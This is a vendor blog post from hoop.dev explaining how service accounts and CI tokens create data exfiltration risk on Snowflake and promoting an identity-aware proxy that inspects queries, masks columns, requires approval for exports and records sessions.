All posts

Non-human identity: what it means for your data exfiltration (on Snowflake)

Imagine a CI pipeline that runs nightly analytics jobs against your Snowflake warehouse. The pipeline uses a service account whose credentials are baked into a Docker image and shared across dozens of repositories, creating a data exfiltration risk. When the job finishes, an internal S3 bucket that is publicly readable within the corporate network receives the artifact containing raw query results. A few weeks later, an off‑boarded contractor who still has a copy of the service account token dis

Free White Paper

Non-Human Identity Management + AI Data Exfiltration Prevention: The Complete Guide

Architecture patterns, implementation strategies, and security best practices. Delivered to your inbox.

Free. No spam. Unsubscribe anytime.

Imagine a CI pipeline that runs nightly analytics jobs against your Snowflake warehouse. The pipeline uses a service account whose credentials are baked into a Docker image and shared across dozens of repositories, creating a data exfiltration risk. When the job finishes, an internal S3 bucket that is publicly readable within the corporate network receives the artifact containing raw query results. A few weeks later, an off‑boarded contractor who still has a copy of the service account token discovers the bucket and downloads the data. Your security team traces the breach back to the service account, but no alert fires because the connection to Snowflake streams data directly without any audit. This unchecked flow is a classic data exfiltration scenario.

This scenario illustrates a common reality: non‑human identities, service accounts, CI tokens, automation keys, are often granted sweeping privileges, stored in places that are easy to copy, and used without any visibility into what they actually do. When those identities are compromised, the attacker inherits exactly the same level of access, making data exfiltration a low‑effort, high‑impact attack.

Why data exfiltration is a risk with non‑human identities

Snowflake is designed for massive data analytics, which means it holds large, valuable datasets. Non‑human identities typically have long‑lived credentials that are not tied to a single human user. Because they are meant for automation, they often receive read‑only or read‑write roles on many schemas, tables, and views. The lack of a human in the loop means there is no real‑time review of the queries being executed.

Two concrete weaknesses emerge:

  • Unrestricted data flow. An automation job can export entire tables to external storage with a single COPY INTO command. If the job is compromised, that command can be repurposed to ship data to an attacker‑controlled endpoint.
  • Invisible activity. Traditional audit logs in Snowflake capture who ran a query, but they do not enforce policy at the moment of execution. If a malicious script runs under the service account, the logs only show that the service account ran the query, nothing flags the abnormal data volume or destination.

Both issues stem from the fact that the enforcement point is missing. The identity system decides who may start a session, but once the session is established, Snowflake itself does not block or record the data that leaves the system in real time.

What a proper enforcement layer looks like

The missing piece is a gateway that sits on the data path between the non‑human identity and Snowflake. The gateway must be able to:

Continue reading? Get the full guide.

Non-Human Identity Management + AI Data Exfiltration Prevention: Architecture Patterns & Best Practices

Free. No spam. Unsubscribe anytime.
  • Inspect every query before it reaches Snowflake.
  • Require just‑in‑time approval for commands that export data.
  • Mask sensitive columns in query results when the request originates from an automated job.
  • Record the entire session for replay and forensic analysis.

Only when these controls are enforced at the gateway can you be confident that a service account cannot be abused to exfiltrate data without detection.

How hoop.dev stops data exfiltration

hoop.dev acts as a Layer 7 identity‑aware proxy that sits in front of Snowflake. When a non‑human identity attempts to connect, hoop.dev authenticates the token, checks group membership, and then forwards the request through its data‑path engine. Because hoop.dev is the only place the traffic passes, it can enforce the controls listed above.

Specifically, hoop.dev records each session, so you have a replay of every query and response. It can inline mask columns that contain personally identifiable information, ensuring that downstream automation never sees raw values. For any command that attempts to write to external storage, hoop.dev triggers a just‑in‑time approval workflow; the request pauses until an authorized human approves the export. If a command is deemed unsafe, hoop.dev blocks it before Snowflake ever sees it. All of these outcomes exist because hoop.dev sits in the data path, not because the identity provider or Snowflake itself provides them.

To get started, follow the getting‑started guide and review the feature documentation. The open‑source repository contains the full implementation and examples for Snowflake.

FAQ

Q: Does hoop.dev replace Snowflake’s native audit logs?
A: No. hoop.dev complements Snowflake’s logs by adding real‑time session recording and inline masking that Snowflake does not provide on its own.

Q: Can I use hoop.dev with existing service accounts?
A: Yes. You register the Snowflake connection in hoop.dev and point your automation to the hoop.dev endpoint; the original credentials stay hidden inside the gateway.

Q: What happens if a malicious script tries to bypass the gateway?
A: Because hoop.dev is the only network‑reachable endpoint for Snowflake, any direct connection attempt is blocked by network policies. The gateway is the enforced boundary.

Explore the source code, contribute improvements, and see how the community secures data pipelines on GitHub: https://github.com/hoophq/hoop.

Open source

Save the open-source gateway for agent data access

Hoop is MIT-licensed infrastructure for controlling how AI agents reach production data. Star hoophq/hoop so you can inspect it, deploy it, or share it when your team starts governing agent access.

Star and save the repo →More posts